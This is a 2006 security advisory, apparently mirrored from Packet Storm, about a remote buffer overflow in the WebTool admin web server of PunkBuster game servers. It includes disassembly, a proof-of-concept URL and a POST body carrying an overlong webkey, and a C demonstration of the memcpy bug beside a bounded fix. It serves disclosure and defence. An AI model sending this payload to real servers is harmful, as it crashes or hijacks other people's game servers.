PunkBuster-1.229.txt

2006-05-26T00:00:00
ID PACKETSTORM:46719
Type packetstorm
Reporter aluigi.org
Modified 2006-05-26T00:00:00

Description

#######################################################################  
  
Luigi Auriemma  
  
Application: PunkBuster  
http://www.punkbuster.com  
Versions: PunkBuster for servers, all versions lower than v1.229; the last affected build per game is:  
America's Army <= v1.228  
Battlefield 1942 <= v1.158  
Battlefield 2 <= v1.184  
Battlefield Vietnam <= v1.150  
Call of Duty <= v1.173  
Call of Duty 2 <= v1.108  
DOOM 3 <= v1.159  
Enemy Territory <= v1.167  
Far Cry <= v1.150  
F.E.A.R. <= v1.093  
Joint Operations <= v1.187  
Quake III Arena <= v1.150  
Quake 4 <= v1.181  
Rainbow Six 3: Raven Shield <= v1.169  
Rainbow Six 4: Lockdown <= v1.093  
Return to Castle Wolfenstein <= v1.175  
Soldier of Fortune II <= v1.183  
Platforms: Win32, Linux and Mac  
Bug: buffer overflow in the built-in web server used for remote  
server administration (WebTool)  
Exploitation: remote, versus server  
Date: 23 May 2006  
Author: Luigi Auriemma  
e-mail: aluigi@autistici.org  
web: aluigi.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bug  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
PunkBuster is the anti-cheat system developed by Even Balance  
(http://www.evenbalance.com), officially used and distributed with  
almost all of the most played commercial multiplayer FPS games.  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
  
PunkBuster contains a built-in HTTP server called WebTool, which allows  
admins to manage their game servers remotely through a normal web  
browser:  
  
http://www.evenbalance.com/publications/admins/#webtool  
  
This web server is not enabled by default; it is activated by choosing  
the TCP port on which the service listens, using the command:  
pb_sv_httpport PORT  
  
The authentication mechanism is handled through a parameter called  
webkey, which carries the password and is sent by the client either in  
a POST body or directly in the URL.  
  
A webkey longer than 1024 bytes triggers a buffer overflow: the program  
uses memcpy to copy the attacker's string, with the attacker's own  
length, into a fixed-size buffer that is then compared against the  
service's password.  
  
The following is the code from pbsv.dll 1.183 (Soldier of Fortune II)  
where the exception that terminates the game occurs:  
  
...  
0511B3A8 8BB424 58100000 MOV ESI,DWORD PTR SS:[ESP+1058]  
0511B3AF 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18]  
0511B3B3 6A 41 PUSH 41  
0511B3B5 50 PUSH EAX  
0511B3B6 C68424 55100000 >MOV BYTE PTR SS:[ESP+1055],0  
0511B3BE FF96 54010000 CALL DWORD PTR DS:[ESI+154]  
0511B3C4 8BBC24 64100000 MOV EDI,DWORD PTR SS:[ESP+1064]  
...  
  
The ESI register is controlled by the attacker, so the indirect  
CALL DWORD PTR DS:[ESI+154] goes through an attacker-chosen pointer.  
The memcpy call described above is instead located at offset  
0512aea7.  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
Send the following text file to the port on which the PunkBuster  
WebTool is listening:  
  
http://aluigi.org/poc/pbwebbof.txt  
  
or simply build and use a link like the following:  
  
http://127.0.0.1:80/pbsvweb/plist=1&webkey=aaaaaaaaaaaaa...1044...aaa  
  
POST /pbsvweb HTTP/1.1  
  
webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff  
cmds=Command Screen  
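  
The program below is an added example, not Even Balance's code and not  
the author's PoC. It is a stand-in for the webkey check described in  
section 2, showing the memcpy-with-attacker-length bug beside a bounded  
version, and it rebuilds the section 3 request body in memory to drive  
both. Everything specific is assumed: the 1024-byte key slot comes from  
the advisory's "longer than 1024 bytes", the password "s3cret" is  
constructed, and the 4-byte MARKER placed right after the slot merely  
plays the role of the saved stack data that the real overflow clobbers  
(the value later loaded into ESI). The flat byte array stands in for the  
stack so the demonstration itself stays in bounds.  
  
```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WEBKEY_BUF 1024                 /* assumed key slot size ("longer than 1024 bytes") */
#define FRAME_SIZE (WEBKEY_BUF + 64)    /* flat byte array standing in for the stack */
#define MARKER     0x41424344u          /* stand-in for the saved data just past the slot */

/* Find the webkey value in a query string or body such as
 * "/pbsvweb/plist=1&webkey=SECRET" or "webkey=SECRET\ncmds=Command Screen".
 * The value ends at '&', CR or LF. Returns 1 on success. */
int extract_webkey(const char *s, const char **val, size_t *len)
{
    const char *p = s;
    while (*p) {
        if (strncmp(p, "webkey=", 7) == 0) {
            *val = p + 7;
            *len = strcspn(*val, "&\r\n");
            return 1;
        }
        if ((p = strchr(p, '&')) == NULL)   /* skip to the next key=value pair */
            return 0;
        p++;
    }
    return 0;
}

/* Vulnerable pattern: the copy is bounded by the attacker's length, not by the
 * slot, so whatever follows the slot (here the marker) is overwritten. */
int check_webkey_vulnerable(const char *password, const char *val, size_t len,
                            uint32_t *marker_after)
{
    unsigned char frame[FRAME_SIZE] = {0};
    uint32_t marker = MARKER;
    int ok;

    memcpy(frame + WEBKEY_BUF, &marker, sizeof marker);
    if (len > FRAME_SIZE)               /* demo-only clamp; the real code has none */
        len = FRAME_SIZE;
    memcpy(frame, val, len);            /* the bug: no check against WEBKEY_BUF */
    ok = len == strlen(password) && memcmp(frame, password, len) == 0;
    memcpy(&marker, frame + WEBKEY_BUF, sizeof marker);
    *marker_after = marker;
    return ok;
}

/* Bounded version: reject before copying, so the request never picks the length. */
int check_webkey_fixed(const char *password, const char *val, size_t len)
{
    char key[WEBKEY_BUF];
    if (len >= sizeof key)
        return 0;
    memcpy(key, val, len);
    key[len] = '\0';
    return strlen(password) == len && memcmp(key, password, len) == 0;
}

/* Builds the section 3 PoC body in memory (constructed): "webkey=" followed by
 * a_count 'a', then "bbbbccccddddeeeeffff", then "\ncmds=Command Screen\n". */
static char poc_body[WEBKEY_BUF + 256];

const char *make_poc_body(size_t a_count)
{
    if (a_count > sizeof poc_body - 64)
        a_count = sizeof poc_body - 64;
    memcpy(poc_body, "webkey=", 7);
    memset(poc_body + 7, 'a', a_count);
    strcpy(poc_body + 7 + a_count, "bbbbccccddddeeeeffff\ncmds=Command Screen\n");
    return poc_body;
}

/* Run one request body through the vulnerable check; returns the marker afterwards. */
uint32_t marker_after_vulnerable(const char *body, const char *password)
{
    const char *val;
    size_t len;
    uint32_t m = 0;
    if (extract_webkey(body, &val, &len))
        check_webkey_vulnerable(password, val, len, &m);
    return m;
}

/* Run one request body through the bounded check; returns the auth verdict. */
int fixed_auth(const char *body, const char *password)
{
    const char *val;
    size_t len;
    return extract_webkey(body, &val, &len) && check_webkey_fixed(password, val, len);
}

int main(void)
{
    const char *poc = make_poc_body(1044);                  /* same 1044 'a's as the advisory's link */
    uint32_t m = marker_after_vulnerable(poc, "s3cret");    /* "s3cret": constructed password */
    printf("marker after vulnerable copy: 0x%08x (%s)\n", (unsigned)m,
           m == MARKER ? "intact" : "overwritten by the key");
    printf("fixed check accepts PoC key: %d\n", fixed_auth(poc, "s3cret"));
    return 0;
}
```
  
With the 1044-byte key the vulnerable copy writes "aaaa" over the marker  
(0x61616161 in place of 0x41424344), which is exactly the effect the  
listing in section 2 shows: a value the attacker placed on the stack is  
later loaded into ESI and dereferenced by the indirect call. A key of  
1000 'a's plus the 20-byte tail (1020 bytes) stays inside the slot and  
leaves the marker intact. The bounded version rejects anything that  
would not fit before a single byte is copied.  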
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
Update to v1.229 or above.  
  
  
#######################################################################  
  
  
---   
Luigi Auriemma  
http://aluigi.org  
http://mirror.aluigi.org  